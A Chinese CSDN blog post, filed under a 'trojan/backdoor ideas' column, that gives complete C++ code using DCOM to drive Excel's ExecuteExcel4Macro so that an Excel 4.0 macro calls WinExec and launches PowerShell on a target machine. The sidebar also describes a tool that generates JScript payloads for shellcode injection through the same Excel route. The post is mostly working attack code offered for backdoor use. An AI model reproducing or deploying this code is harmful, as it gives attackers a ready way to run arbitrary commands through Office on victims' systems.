C++通过DCOM调用Excel.ExecuteExcel4Macro执行宏代码

最新推荐文章于 2024-04-25 20:09:15 发布
最新推荐文章于 2024-04-25 20:09:15 发布
阅读量1.2k 收藏 2
点赞数 2
分类专栏: 木马后门思路
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cssxn/article/details/112594116
版权

通过cpp调用excel.application对象的ExecuteExcel4Macro方法来执行任意宏代码,
宏代码直接调用NativeAPI执行WinExec创建powershell进程

要求:目标机器必须安装了Excel,

#include "stdafx.h"
#include <windows.h>
#include <iostream>
#include <oaidl.h>
using namespace std;

int _tmain(int argc, _TCHAR* argv[])
{
	HRESULT hRet = E_FAIL;
	CLSID CLSID_excel;
	IDispatch *pXlApp;
	DISPID dispidNamed = DISPID_PROPERTYPUT;
	DISPID dispID;
	DISPPARAMS dispParams = { NULL, NULL, 0, 0 }; // 
	do 
	{
		CoInitialize(NULL);

		hRet = CLSIDFromProgID(L"Excel.Application", &CLSID_excel);
		if (FAILED(hRet))
		{
			break;
		}

		hRet = CoCreateInstance(CLSID_excel, NULL, CLSCTX_LOCAL_SERVER, IID_IDispatch, (void **)&pXlApp);
		if (FAILED(hRet))
		{
			break;
		}

		// 根据名字获取方法ID
		OLECHAR* szFuncName = L"ExecuteExcel4Macro";
		hRet = pXlApp->GetIDsOfNames(IID_NULL, &szFuncName, 1, LOCALE_SYSTEM_DEFAULT, &dispID);
		if (FAILED(hRet))
		{
			break;
		}

		dispParams.cArgs = 1;
		dispParams.cNamedArgs = 0;
		dispParams.rgdispidNamedArgs = NULL;
		dispParams.rgvarg = new VARIANTARG;
		dispParams.rgvarg->vt = VT_BSTR;
		dispParams.rgvarg->bstrVal = SysAllocString(L"call(\"kernel32\", \"WinExec\", \"JFJ\", \"powershell\", 5)");



		hRet = pXlApp->Invoke(dispID, IID_NULL, LOCALE_SYSTEM_DEFAULT, DISPATCH_METHOD, &dispParams, NULL, NULL, NULL);
		if (FAILED(hRet))
		{
			break;
		}

		SysFreeString(dispParams.rgvarg->bstrVal);
		delete dispParams.rgvarg;
		CoUninitialize();


	} while (false);
	

	return 0;
}
FFE4
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
genxlm:一个简单的脚本,用于生成JScript代码,以通过Excel使用XLMExcel 4.0宏调用Win32 API函数。Application“ ExecuteExcel4Macro
04-16
描述 只需一个简单的脚本即可生成JScript代码,以通过Excel.Application COM对象和“ ExecuteExcel4Macro”方法使用XLM / Excel 4.0宏来调用Win32 API函数。 该脚本将通过调用VirtualAlloc-> WriteProcessMemory-> CreateThread生成一个简单的有效载荷,以执行非常基本的shellcode注入(只是POC,可以考虑使用更好的选项。) 用法 -o string output payload filename -sh string Shellcode file path, ex: go run genXLM.go -sh shellcode.bin -wsh string payload template js/hta, ex: go run genXLM.go -sh shellcode.b
C++ 操作EXCEL
09-22
C++ 操作EXCELC++ 操作EXCELC++ 操作EXCELC++ 操作EXCEL
VC编程实现运行Excel宏 Run
jangdong的专栏
12-03 2688
CApplication xlsAppLication; //初始化略 CString macro = _T("macro");//excel文件中的宏名字 例如:假如宏的名字是marco1 那么就传入macro = _T("macro1"); xlsAppLication.Run(_variant_t(macro),vtMissing,vtMissing,vtMissing,vtMissing,vtMissing,vtMissing,vtMissing,vtMissing,vtMissing,vtM
Visual C++源代码 192 如何使用自动化运行Excel
06-22
Visual C++源代码 192 如何使用自动化运行Excel宏Visual C++源代码 192 如何使用自动化运行Excel宏Visual C++源代码 192 如何使用自动化运行Excel宏Visual C++源代码 192 如何使用自动化运行Excel宏Visual C++源代码 192 如何使用自动化运行Excel宏Visual C++源代码 192 如何使用自动化运行Excel宏Visual C++源代码 192 如何使用自动化运行Excel宏Visual C++源代码 192 如何使用自动化运行Excel宏Visual C++源代码 192 如何使用自动化运行Excel宏Visual C++源代码 192 如何使用自动化运行Excel宏Visual C++源代码 192 如何使用自动化运行Excel宏Visual C++源代码 192 如何使用自动化运行Excel宏Visual C++源代码 192 如何使用自动化运行Excel宏Visual C++源代码 192 如何使用自动化运行Excel宏Visual C++源代码 192 如何使用自动化运行Excel宏Visua
c++实现对EXCEL文件操作
最新发布
weixin_47447583的博客
04-25 388
【代码】c++实现对EXCEL文件操作。
ExecuteExcel4Macro (宏函数)使用说明
weixin_30618985的博客
12-18 973
ExecuteExcel4Macro从未打开的Excel工作簿中读取数据(转载) 从另外一个未打开的Excel文件中读取数据的函数 下面这个函数调用XLM宏从未打开的工作簿中读取数据. *注意:该函数不能用于公式. GetValue函数,需要以下四个变量 path:未打开的Excel文件的路径 (e.g., "d:\test") file:文件名(e.g.,...
c++代码操作excel
weixin_52355496的博客
07-06 371
如果使用qt或vs打开excel 默认打开的是wps ,可以使用wps配置工具设置与office兼容性,来设置默认打开mircsoft的excel。取消勾选-兼容第三方系统和软件。
Visual C++ 6 DCOM开发指南.part4.rar
04-05
Visual C++ 6 DCOM开发指南.part4.rarVisual C++ 6 DCOM开发指南.part4.rar 共5部分,下载完这5部分才能解压成功
Visual C++ 6 DCOM开发指南.part5.rar
04-05
Visual C++ 6 DCOM开发指南.part5.rarVisual C++ 6 DCOM开发指南.part5.rarVisual C++ 6 DCOM开发指南.part5.rar 共5部分,下载完这5部分才能解压成功
Visual C++ 6 DCOM开发指南.part3.rar
04-05
Visual C++ 6 DCOM开发指南.part3.rarVisual C++ 6 DCOM开发指南.part3.rar 共5部分,下载完这5部分才能解压成功
Visual C++ 6 DCOM开发指南.part1.rar
04-05
Visual C++ 6 DCOM开发指南.part1.rarVisual C++ 6 DCOM开发指南.part1.rarVisual C++ 6 DCOM开发指南.part1.rar 共5部分,下载完这5部分才能解压成功
Excel 4.0 Macro 宏规范
04-17
Microsoft很早就使用VBA宏(Visual Basic for Applications)来代替Excel 4.0宏技术,这导致Excel 4.0宏并不为大众所熟知。并且Excel 4.0宏存放在Excel 97 - 2003格式(.xls)文件中。
使用自动化运行Excel宏编程实例锦集
03-16
使用自动化运行Excel宏编程实例锦集,C++.net源代码编写,VisualStudio.net
Visual C++ 6 DCOM开发指南.part2.rar
04-05
Visual C++ 6 DCOM开发指南.part2.rarVisual C++ 6 DCOM开发指南.part2.rarVisual C++ 6 DCOM开发指南.part2.rar 共5部分,下载完这5部分才能解压成功
excel——宏表函数
Alter__的博客
07-13 716
返回NA表示禁用了宏 get.cell(type_num,reference) 获取单元格的信息 formulatext() 获取单元格公式 get.workbook() type_num:1 获得的数据是一个数组,想要获得数组中的数位index(数组,row()) hyperlink(链接,名字) 实现点击链接切换工作簿:hyperlink(index(数组,1)&"!a1") evaluate() 运算 substitute(字符串,目标字符,替换为什么字符) ...
c语言运行excel中vba程序,Excel 中如何运行 VBA 代码?
weixin_39673704的博客
05-22 2304
编写 VBA 的最终目的是在 Excel 中运行它,得到特定的结果。所以,写完一段 VBA 代码后,下一步骤就是运行它。需要指出的是,本篇所指的「运行」指的是,在 Excel 界面中运行,而非在 VBA 编辑器中运行。今天这篇文章就介绍如何在 Excel 里运行 VBA 的多种方法。不同的方法适用的情形不一样,可以根据特定需求,选择其中一种使用。一般来说,运行 VBA 有以下 3 种方法:从「开发...
VBA陈旧的代码:在VBA中操作Excel内容二
VB.Net+Android.java
06-07 1242
代码有的是来自网络,包括csdn。有的是自己的。呵呵。Dim xlApp As Excel.ApplicationDim xlBook As Excel.WorkbookDim xlSheet As Excel.Worksheetdim XXXSet xlApp = CreateObject("Excel.Application")Set xlBook = NothingSet xlSheet
EXCEL--2010单元格里下拉菜单的制作
世上无难事只要肯放弃
11-24 4531
单选下拉菜单的设置   1、选定需要设置下拉菜单的区域   2、单击菜单栏“数据 | 数据有效性”         点击向下箭头,然后选择“序列”    3、在来源处输入自己想要设置的数据,每个数据用英文逗号隔开 4、查看一开始所选区域的任意单元格里的向下箭头都会弹出自己设置的数据,选择“图图”        温馨提示:在第三步设置数据的来源时也可以将想
l操作excel
a5537489的博客
11-10 199
Range.EntireColumn  和Range.EntireRow  获取Excel一列或者一行操作
java -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port=9010 -Dcom.sun.management.jmxremote.local.only=false -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false -Djava.rmi.server.hostname=127.0.0.1 -jar httpUtil.jar
06-08
这是一个 Java 命令行启动应用程序的示例,其中包含了 JMX 监控相关的参数配置。具体解释如下: - `-Dcom.sun.management.jmxremote`:启用 JMX 监控功能。 - `-Dcom.sun.management.jmxremote.port=9010`:配置 JMX 监控使用的端口号为 9010。 - `-Dcom.sun.management.jmxremote.local.only=false`:允许远程连接 JMX 监控。 - `-Dcom.sun.management.jmxremote.authenticate=false`:关闭 JMX 监控的认证功能。 - `-Dcom.sun.management.jmxremote.ssl=false`:关闭 JMX 监控的 SSL 加密功能。 - `-Djava.rmi.server.hostname=127.0.0.1`:配置 JMX 监控使用的主机名为 127.0.0.1。 - `-jar httpUtil.jar`:启动 httpUtil.jar 应用程序。 这些参数配置可以让你在应用程序运行时通过 JMX 监控工具(如 JConsole、VisualVM 等)来监控应用程序的运行状态和性能指标。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值